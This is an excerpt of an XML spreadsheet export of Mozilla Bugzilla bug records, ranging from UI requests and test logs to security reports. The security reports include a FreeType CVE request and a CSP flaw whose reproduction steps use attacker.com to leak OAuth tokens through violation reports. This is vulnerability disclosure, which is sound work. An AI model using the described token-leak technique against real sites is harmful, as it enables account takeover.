        </is>
      </c>
      <c r="T492" t="n">
        <v>1</v>
      </c>
      <c r="U492" t="n">
        <v>0</v>
      </c>
      <c r="V492" t="n">
        <v>30</v>
      </c>
      <c r="W492" t="inlineStr">
        <is>
          <t>I think it would be a good idea if we added the "container" images that are found under "File -&gt; New Container Tab" into the "Open link in a Container Tab" context menu. This way, it will be easier for users to distinguish the difference between each container and would match the file menu. However, I'm not sure if there's any internal design rules about adding images into context menu's.</t>
        </is>
      </c>
      <c r="X492" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="493">
      <c r="A493" t="n">
        <v>36657</v>
      </c>
      <c r="B493" t="inlineStr">
        <is>
          <t>2000-04-21 00:06:14 -0700</t>
        </is>
      </c>
      <c r="C493" t="inlineStr">
        <is>
          <t>Only four panels available to add to Sidebar</t>
        </is>
      </c>
      <c r="D493" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E493" t="n">
        <v>1</v>
      </c>
      <c r="F493" t="n">
        <v>1</v>
      </c>
      <c r="G493" t="n">
        <v>2</v>
      </c>
      <c r="H493" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I493" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J493" t="inlineStr">
        <is>
          <t>Sidebar</t>
        </is>
      </c>
      <c r="K493" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L493" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M493" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N493" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O493" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P493" t="inlineStr">
        <is>
          <t>[nsbeta2+][rjc]</t>
        </is>
      </c>
      <c r="Q493" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R493" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S493" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T493" t="n">
        <v>1</v>
      </c>
      <c r="U493" t="n">
        <v>0</v>
      </c>
      <c r="V493" t="n">
        <v>35</v>
      </c>
      <c r="W493" t="inlineStr">
        <is>
          <t>After blowing up my .mozilla directory, I started a new profile, so I'm down to
the starting four panels (What's Related, Search, Tinderbox, Bookmarks).  When I
try to add more (by clicking on Customize...), only three are available to add,
and I have all of them! (What's Related, Search, Bookmarks)  In my old profile,
I had many panels like Sports, Reuters News, Movies, Stocks, etc., which I can
no longer add.</t>
        </is>
      </c>
      <c r="X493" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="494">
      <c r="A494" t="n">
        <v>733512</v>
      </c>
      <c r="B494" t="inlineStr">
        <is>
          <t>2012-03-06 12:56:57 -0800</t>
        </is>
      </c>
      <c r="C494" t="inlineStr">
        <is>
          <t>FreeType: Multiple security flaws to be fixed in v2.4.9</t>
        </is>
      </c>
      <c r="D494" t="inlineStr">
        <is>
          <t>2012-05-18 13:26:02 -0700</t>
        </is>
      </c>
      <c r="E494" t="n">
        <v>1</v>
      </c>
      <c r="F494" t="n">
        <v>1</v>
      </c>
      <c r="G494" t="n">
        <v>3</v>
      </c>
      <c r="H494" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I494" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J494" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K494" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L494" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M494" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N494" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O494" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P494" t="inlineStr">
        <is>
          <t>[sg:critical][qa?]</t>
        </is>
      </c>
      <c r="Q494" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R494" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S494" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T494" t="n">
        <v>1</v>
      </c>
      <c r="U494" t="n">
        <v>0</v>
      </c>
      <c r="V494" t="n">
        <v>14</v>
      </c>
      <c r="W494" t="inlineStr">
        <is>
          <t>We received a forward of this FreeType security issue. Per Dveditz, this is still used in Mobile Firefox. We should take the FreeType update to 2.4.9 since it looks like we still use 2.4.3 on Central (see http://mxr.mozilla.org/mozilla-central/source/modules/freetype2/ChangeLog).
Date: Tue, 06 Mar 2012 20:57:12 +0100
From: Jan Lieskovsky &lt;jlieskov@redhat.com&gt;
Subject: [oss-security] CVE Request -- FreeType: Multiple security flaws to be fixed in v2.4.9
Hello Kurt, Steve, vendors,
we have been notified by Mateusz Jurczyk of the Google Security Team,
about the following FreeType security flaws, which are going to be fixed
in v2.4.9 version.
Credit: Mateusz Jurczyk, Google Security Team
Note: Though some the issues below might look like related / the same,
I have checked that each of them exclude themselves (IOW each of them
is different issue like the another. But was lazy to cross-reference
those, which of them is different from which another.
       Reproducers are attached to relevant upstream bug reports.
       Have Cc-ed Werner Lemberg of FreeType upstream on this post too,
       so he could collect CVE identifiers prior FreeType v2.4.9
       release.
       Yet, requesting CVE identifier even for the NULL ptr dereference
       and floating point exception / integer divide by zero issue
       below, even if Red Hat would not consider these to be security
       flaws. But other distributions might be doing so, thus will let
       Steve to decide, if these two desire CVE identifiers or not.
       And finally, due the count of the issues, not including full
       issues description under each entry (to shorten the request).
       Only particular Red Hat Bugzilla entry summary is included with
       relevant links to upstream bugs and commits. Further issue
       description can be found under particular Red Hat Bugzilla entry
       for each of them in initial comment (#c0).
Kurt, Steve, could you allocate CVE identifiers for these?
Thank you &amp;&amp; Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team
Issue #1:
=========
   freetype: Out-of heap-based buffer read by parsing, adding
properties in BDF fonts, or validating if property being an atom
(FU#35597, FU#35598)
Upstream bug reports:
[1] https://savannah.nongnu.org/bugs/?35597
[2] https://savannah.nongnu.org/bugs/?35598
Upstream patch:
[3] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=320d4976d1d010b5abe9d61a7423d8ca06bc34df
Red Hat Bugzilla entry:
[4] https://bugzilla.redhat.com/show_bug.cgi?id=800581
Issue #2:
=========
   freetype: Out-of heap-based buffer read by parsing glyph information
and bitmaps for BDF fonts (FU#35599, FU#35600)
Upstream bug reports:
[1] https://savannah.nongnu.org/bugs/?35599
[2] https://savannah.nongnu.org/bugs/?35600
Upstream patch:
[3] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=0b1c0c6b20bf121096afff206d570f26183402b3
Red Hat Bugzilla entry:
[4] https://bugzilla.redhat.com/show_bug.cgi?id=800583
Issue #3:
=========
   freetype: NULL pointer dereference by moving zone2 pointer point for
certain TrueType font (FU#35601)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35601
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=96cddb8d1d32d6738b06552083db9d6cee5b5cb4
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800584
Issue #4:
=========
   freetype: Out-of heap-based buffer read when parsing certain SFNT
strings by Type42 font parser (FU#35602)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35602
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=82365c0dead99dd119d9e7117cf4f36ce1d1cbe1
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800585
Issue #5:
=========
   freetype: Out-of heap-based buffer read by loading properties of PCF
   fonts (FU#35603)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35603
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=c776fc17bfeaa607405fc96620e9445e7a0965c3
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800587
Issue #6:
=========
   freetype (64-bit specific): Out-of heap-based buffer read by attempt
to record current cell into the cell table (FU#35604)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35604
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=fcbc82e69e7b114b0db75e955896107d611898e6
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800589
Issue #7:
=========
   freetype: Out-of heap-based buffer read flaw in Type1 font loader by
   parsing font dictionary entries (FU#35606)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35606
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=58cbc465d2ccd904dee755cff791fbb3a866646d
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800590
Issue #8:
=========
   freetype: Out-of heap-based buffer write by parsing BDF glyph
information and bitmaps (FU#35607)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35607
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=28dd2c45957278e962f95633157b6139de8170aa
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800591
Issue #9:
=========
   freetype: Out-of heap-based buffer write in Type1 font parser by
retrieving font's private dictionary (FU#35608)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35608
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=d9577add645c8c05460c7d60ad486c021394b82e
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800592
Issue #10:
==========
   freetype: Out-of heap-based buffer read in TrueType bytecode
interpreter by executing NPUSHB and NPUSHW instructions (FU#35640)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35640
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=5dddcc45a03b336860436a180aec5b358517336b
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800593
Issue #11:
==========
   freetype: Out-of heap-based buffer write by parsing BDF glyph and
bitmaps information with missing ENCODING field (FU#35641)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35641
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=4086fb7caf41e33137e548e43a49a97b127cd369
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800594
Issue #12:
==========
   freetype: Out-of heap-based buffer read by parsing BDF font header
(FU#35643)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35643
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=cee5d593582801f65c5e127d9de9ca24ebcdc747
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800595
Issue #13:
==========
   freetype: Out-of heap-based buffer read in the TrueType bytecode
   interpreter by executing the MIRP instruction (FU#35646)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35646
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=a33c013fe2dc6e65de2879682201d9c155292349
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800597
Issue #14:
==========
   freetype: Array index error, leading to out-of stack based buffer
   read by parsing BDF font glyph information (FU#35656)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35656
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=6ac022dc750d95296a6f731b9594f2e751d997fa
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800598
Issue #15:
==========
   freetype: Out-of heap-based buffer read by conversion of PostScript
font objects (FU#35657)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35657
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=292144b44a15c1a72f2ef76475d65b7a3a3fba67
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800600
Issue #16:
==========
   freetype: Out-of heap-based buffer read flaw by conversion of an
ASCII string into a signed short integer by processing BDF fonts
(FU#35658)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35658
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=d9c1659610f9cd5e103790cb5963483d65cf0d2d
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800602
Issue #17:
==========
   freetype: Out-of heap-based buffer write by retrieval of advance
values for glyph outlines (FU#35659)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35659
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=7d35a7dc7cc621538a1f4a63c83ebf223aace0b0
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800604
Issue #18:
==========
   freetype: Integer divide by zero by performing arithmetic
   computations for certain fonts (FU#35660)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35660
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=ba67957d5ead443f4b6b31805d6e780d54361ca4
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800606
Issue #19:
==========
   freetype: Out-of heap-based buffer write in the TrueType bytecode
   interpreter by moving zone2 pointer point (FU#35689)
Upstream bug report:
[1] https://savannah.nongnu.org/bugs/?35689
Upstream patch:
[2] 
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=0fc8debeb6c2f6a8a9a2b97332a7c8a0a1bd9e85
Red Hat Bugzilla entry:
[3] https://bugzilla.redhat.com/show_bug.cgi?id=800607</t>
        </is>
      </c>
      <c r="X494" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="495">
      <c r="A495" t="n">
        <v>198019</v>
      </c>
      <c r="B495" t="inlineStr">
        <is>
          <t>2003-03-18 07:17:29 -0800</t>
        </is>
      </c>
      <c r="C495" t="inlineStr">
        <is>
          <t>Bugzilla Guide contains no end-user docs for Flags</t>
        </is>
      </c>
      <c r="D495" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:35 -0800</t>
        </is>
      </c>
      <c r="E495" t="n">
        <v>1</v>
      </c>
      <c r="F495" t="n">
        <v>1</v>
      </c>
      <c r="G495" t="n">
        <v>4</v>
      </c>
      <c r="H495" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I495" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J495" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K495" t="inlineStr">
        <is>
          <t>2.17.3</t>
        </is>
      </c>
      <c r="L495" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M495" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N495" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O495" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P495" t="inlineStr"/>
      <c r="Q495" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R495" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S495" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T495" t="n">
        <v>1</v>
      </c>
      <c r="U495" t="n">
        <v>0</v>
      </c>
      <c r="V495" t="n">
        <v>8</v>
      </c>
      <c r="W495" t="inlineStr">
        <is>
          <t>It was brought up on the developers list that there aren't any end-user docs for
Flags in the Guide...</t>
        </is>
      </c>
      <c r="X495" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="496">
      <c r="A496" t="n">
        <v>1687342</v>
      </c>
      <c r="B496" t="inlineStr">
        <is>
          <t>2021-01-18 09:46:38 -0800</t>
        </is>
      </c>
      <c r="C496" t="inlineStr">
        <is>
          <t>Firefox leaks full redirect path via CSP violation reports</t>
        </is>
      </c>
      <c r="D496" t="inlineStr">
        <is>
          <t>2024-05-30 10:26:15 -0700</t>
        </is>
      </c>
      <c r="E496" t="n">
        <v>1</v>
      </c>
      <c r="F496" t="n">
        <v>1</v>
      </c>
      <c r="G496" t="n">
        <v>3</v>
      </c>
      <c r="H496" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I496" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J496" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K496" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L496" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M496" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N496" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O496" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P496" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][domsecurity-active][sec-survey][adv-main86+][adv-esr78.8+]</t>
        </is>
      </c>
      <c r="Q496" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R496" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S496" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T496" t="n">
        <v>1</v>
      </c>
      <c r="U496" t="n">
        <v>0</v>
      </c>
      <c r="V496" t="n">
        <v>32</v>
      </c>
      <c r="W496" t="inlineStr">
        <is>
          <t>Created attachment 9197786
oauth-leak.png
Tested on: Firefox 84.0.2 (64 bits) (Windows)
In Firefox, Content Security Policy (CSP) violation reports triggered by a redirect did not remove path information as required by the CSP specification: https://www.w3.org/TR/CSP/#security-violation-reports
This potentially reveals information about the redirect that would not otherwise be known to the original site. This could be used by a malicious site to obtain sensitive information such as usernames or single-sign-on tokens encoded within the target URLs.
It looks like this is a recurring problem:
https://bugzilla.mozilla.org/show_bug.cgi?id=1208946
https://bugzilla.mozilla.org/show_bug.cgi?id=1069762
Steps to reproduce:
In a scenario where https://example-01.com performs a code 302 redirect to https://example-02.com/?secret=mysecret
1. The page https://attacker.com is served with the header "Content-Security-Policy: frame-src https://example-01.com; report-uri /report"
2. The page https://attacker.com attempts to iframe https://example-01.com
3. The full path of the redirect ( https://example-02.com/?secret=mysecret ) is leaked to the attacker through the violation report.
It's possible to leak the full path of chained redirects by iframing each leaked URL in a new page with a CSP frame-src directive that matches the domain of the leaked URL.
Through this bug it's possible to leak OAuth authorization codes and access tokens (image attached from a real case), thus getting access to the victim's resources.</t>
        </is>
      </c>
      <c r="X496" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="497">
      <c r="A497" t="n">
        <v>1315650</v>
      </c>
      <c r="B497" t="inlineStr">
        <is>
          <t>2016-11-07 04:35:25 -0800</t>
        </is>
      </c>
      <c r="C497" t="inlineStr">
        <is>
          <t>Intermittent browser_UsageTelemetry_searchbar.js | Test timed out -</t>
        </is>
      </c>
      <c r="D497" t="inlineStr">
        <is>
          <t>2018-09-03 11:15:45 -0700</t>
        </is>
      </c>
      <c r="E497" t="n">
        <v>1</v>
      </c>
      <c r="F497" t="n">
        <v>1</v>
      </c>
      <c r="G497" t="n">
        <v>2</v>
      </c>
      <c r="H497" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I497" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J497" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K497" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L497" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M497" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N497" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O497" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P497" t="inlineStr">
        <is>
          <t>[measurement:client]</t>
        </is>
      </c>
      <c r="Q497" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R497" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S497" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T497" t="n">
        <v>1</v>
      </c>
      <c r="U497" t="n">
        <v>0</v>
      </c>
      <c r="V497" t="n">
        <v>19</v>
      </c>
      <c r="W497" t="inlineStr">
        <is>
          <t>https://treeherder.mozilla.org/logviewer.html#?job_id=38755008&amp;repo=mozilla-inbound
[task 2016-11-07T09:11:42.681786Z] 09:11:42     INFO - TEST-START | browser/modules/test/browser_UsageTelemetry_searchbar.js
[task 2016-11-07T09:13:12.873420Z] 09:13:12     INFO - TEST-INFO | started process screentopng
[task 2016-11-07T09:13:14.511217Z] 09:13:14     INFO - TEST-INFO | screentopng: exit 0
[task 2016-11-07T09:13:14.514550Z] 09:13:14     INFO - Buffered messages logged at 09:11:42
[task 2016-11-07T09:13:14.516456Z] 09:13:14     INFO - Entering test bound setup
[task 2016-11-07T09:13:14.521368Z] 09:13:14     INFO - Leaving test bound setup
[task 2016-11-07T09:13:14.523218Z] 09:13:14     INFO - Entering test bound test_plainQuery
[task 2016-11-07T09:13:14.524888Z] 09:13:14     INFO - Buffered messages logged at 09:11:43
[task 2016-11-07T09:13:14.526795Z] 09:13:14     INFO - Simulate entering a simple search.
[task 2016-11-07T09:13:14.531121Z] 09:13:14     INFO - Buffered messages logged at 09:11:45
[task 2016-11-07T09:13:14.533550Z] 09:13:14     INFO - TEST-PASS | browser/modules/test/browser_UsageTelemetry_searchbar.js | browser.engagement.navigation.searchbar must be recorded. - true == true - 
[task 2016-11-07T09:13:14.535855Z] 09:13:14     INFO - TEST-PASS | browser/modules/test/browser_UsageTelemetry_searchbar.js | browser.engagement.navigation.searchbar must contain the 'search_enter' key. - true == true - 
[task 2016-11-07T09:13:14.542919Z] 09:13:14     INFO - TEST-PASS | browser/modules/test/browser_UsageTelemetry_searchbar.js | 1 - 1 == true - 
[task 2016-11-07T09:13:14.545615Z] 09:13:14     INFO - TEST-PASS | browser/modules/test/browser_UsageTelemetry_searchbar.js | This search must only increment one entry in the scalar. - 1 == 1 - 
[task 2016-11-07T09:13:14.550787Z] 09:13:14     INFO - Leaving test bound test_plainQuery
[task 2016-11-07T09:13:14.553192Z] 09:13:14     INFO - Entering test bound test_oneOff
[task 2016-11-07T09:13:14.558634Z] 09:13:14     INFO - Buffered messages logged at 09:11:46
[task 2016-11-07T09:13:14.560608Z] 09:13:14     INFO - Perform a one-off search using the first engine.
[task 2016-11-07T09:13:14.563017Z] 09:13:14     INFO - Pressing Alt+Down to highlight the first one off engine.
[task 2016-11-07T09:13:14.568247Z] 09:13:14     INFO - Buffered messages logged at 09:11:47
[task 2016-11-07T09:13:14.570500Z] 09:13:14     INFO - TEST-PASS | browser/modules/test/browser_UsageTelemetry_searchbar.js | browser.engagement.navigation.searchbar must be recorded. - true == true - 
[task 2016-11-07T09:13:14.574946Z] 09:13:14     INFO - TEST-PASS | browser/modules/test/browser_UsageTelemetry_searchbar.js | browser.engagement.navigation.searchbar must contain the 'search_oneoff' key. - true == true - 
[task 2016-11-07T09:13:14.577310Z] 09:13:14     INFO - TEST-PASS | browser/modules/test/browser_UsageTelemetry_searchbar.js | 1 - 1 == true - 
[task 2016-11-07T09:13:14.579852Z] 09:13:14     INFO - TEST-PASS | browser/modules/test/browser_UsageTelemetry_searchbar.js | This search must only increment one entry in the scalar. - 1 == 1 - 
[task 2016-11-07T09:13:14.589940Z] 09:13:14     INFO - Leaving test bound test_oneOff
[task 2016-11-07T09:13:14.591672Z] 09:13:14     INFO - Entering test bound test_suggestion
[task 2016-11-07T09:13:14.593591Z] 09:13:14     INFO - Buffered messages logged at 09:11:49
[task 2016-11-07T09:13:14.595446Z] 09:13:14     INFO - Perform a one-off search using the first engine.
[task 2016-11-07T09:13:14.597231Z] 09:13:14     INFO - Buffered messages logged at 09:11:50
[task 2016-11-07T09:13:14.599365Z] 09:13:14     INFO - Console message: [JavaScript Error: "SearchSuggestionController: HTTP Timeout" {file: "resource://gre/modules/SearchSuggestionController.jsm" line: 341}]
[task 2016-11-07T09:13:14.601209Z] 09:13:14     INFO - this.SearchSuggestionController.prototype._dedupeAndReturnResults@resource://gre/modules/SearchSuggestionController.jsm:341:9
[task 2016-11-07T09:13:14.604446Z] 09:13:14     INFO - Handler.prototype.process@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:932:23
[task 2016-11-07T09:13:14.609942Z] 09:13:14     INFO - this.PromiseWalker.walkerLoop@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:813:7
[task 2016-11-07T09:13:14.611839Z] 09:13:14     INFO - Promise*this.PromiseWalker.scheduleWalkerLoop@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:744:11
[task 2016-11-07T09:13:14.614039Z] 09:13:14     INFO - this.PromiseWalker.schedulePromise@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:776:7
[task 2016-11-07T09:13:14.617838Z] 09:13:14     INFO - this.PromiseWalker.completePromise@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:711:7
[task 2016-11-07T09:13:14.619733Z] 09:13:14     INFO - this.SearchSuggestionController.prototype._onRemoteTimeout@resource://gre/modules/SearchSuggestionController.jsm:315:7
[task 2016-11-07T09:13:14.621187Z] 09:13:14     INFO - 
[task 2016-11-07T09:13:14.623002Z] 09:13:14     INFO - Clicking the searchbar suggestion.
[task 2016-11-07T09:13:14.626761Z] 09:13:14     INFO - Buffered messages finished
[task 2016-11-07T09:13:14.628850Z] 09:13:14     INFO - TEST-UNEXPECTED-FAIL | browser/modules/test/browser_UsageTelemetry_searchbar.js | Test timed out - 
[task 2016-11-07T09:13:14.631253Z] 09:13:14     INFO - MEMORY STAT | vsize 20972938MB | residentFast 651MB
[task 2016-11-07T09:13:14.634292Z] 09:13:14     INFO - TEST-OK | browser/modules/test/browser_UsageTelemetry_searchbar.js | took 90867ms
[task 2016-11-07T09:13:14.636367Z] 09:13:14     INFO - Not taking screenshot here: see the one that was previously logged
[task 2016-11-07T09:13:14.639351Z] 09:13:14     INFO - TEST-UNEXPECTED-FAIL | browser/modules/test/browser_UsageTelemetry_searchbar.js | Found a tab after previous test timed out: about:blank -</t>
        </is>
      </c>
      <c r="X497" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="498">
      <c r="A498" t="n">
        <v>1188105</v>
      </c>
      <c r="B498" t="inlineStr">
        <is>
          <t>2015-07-27 14:11:56 -0700</t>
        </is>
      </c>
      <c r="C498" t="inlineStr">
        <is>
          <t>Possible buffer overwrite in SplitDriverVersion</t>
        </is>
      </c>
      <c r="D498" t="inlineStr">
        <is>
          <t>2018-07-06 11:26:06 -0700</t>
        </is>
      </c>
      <c r="E498" t="n">
        <v>1</v>
      </c>
      <c r="F498" t="n">
        <v>1</v>
      </c>
      <c r="G498" t="n">
        <v>3</v>
      </c>
      <c r="H498" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I498" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J498" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K498" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L498" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M498" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N498" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O498" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P498" t="inlineStr">
        <is>
          <t>[CID 1299530][post-critsmash-triage][adv-main43+]</t>
        </is>
      </c>
      <c r="Q498" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R498" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S498" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T498" t="n">
        <v>1</v>
      </c>
      <c r="U498" t="n">
        <v>0</v>
      </c>
      <c r="V498" t="n">
        <v>12</v>
      </c>
      <c r="W498" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #791742 +++
Coverity indicates a possible buffer overwrite in |SplitDriverVersion| [1]. We bail if |destIdx| &gt; 4 [2], but if |destIdx| == 4 we'll overwrite the |dest| buffer.
Rough breakdown from Coverity:
&gt; 184inline bool SplitDriverVersion(const char *aSource, char *aAStr, char *aBStr, char *aCStr, char *aDStr)
&gt; 185{
&gt; 186  // sscanf doesn't do what we want here to we parse this manually.
&gt; 187  int len = strlen(aSource);
&gt; 188  char *dest[4] = { aAStr, aBStr, aCStr, aDStr };
&gt; 189  unsigned destIdx = 0;
&gt; 190  unsigned destPos = 0;
&gt; 191
